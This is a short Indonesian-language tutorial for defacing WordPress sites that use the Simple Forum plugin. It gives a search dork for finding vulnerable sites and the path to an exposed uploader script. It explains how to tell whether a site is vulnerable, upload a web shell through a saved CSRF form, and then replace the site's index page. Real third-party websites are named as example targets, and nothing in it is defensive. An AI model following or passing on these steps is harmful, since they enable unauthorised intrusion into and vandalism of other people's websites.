Tutorial Deface Metode Simple Forum
Bahan :
Dork : inurl:/plugins/simple-forum/
Exploit : resources/jscript/ajaxupload/sf-uploader.php
CSRF FILE :
COPY
Setelah di copy code CSRF Nya save di notepad dengan format HTML
Pertama Copy Dork Diatas atau bisa kembangkan Sendiri
Lalu coba salah satu website yang mau Di Deface , ya tergantung web nya bisa DiDeface Atau Tidak,
Contoh Target gw yang 1 ini
http://newworldinvestor.com/wp-content/plugins/simple-forum/
Tambahkan Belakang Exploit nya
resources/jscript/ajaxupload/sf-uploader.php
Jadinya :
http://sloiki.waw.pl/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
Bila Website nya Bertulis Error Berarti Itu Vuln
Namun Bila Bertulis Acces Dinied Itu Tidak Vuln
Buka CSRF.html tadi dengan Notepad Dan ganti SITE HERE dengan link exploit website kamu yang bertulis error
Nah setelah itu save CSRF.html nya Save Dan Buka lagi lalu Klik Pilih file Dan Masukan Shell Kamu
Setelah Di Upload Panggil shell kamu dengan cara :
site:com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php
Selesai Deh sekarang terserah kamu mau kamu tebas tuh index atau ngakk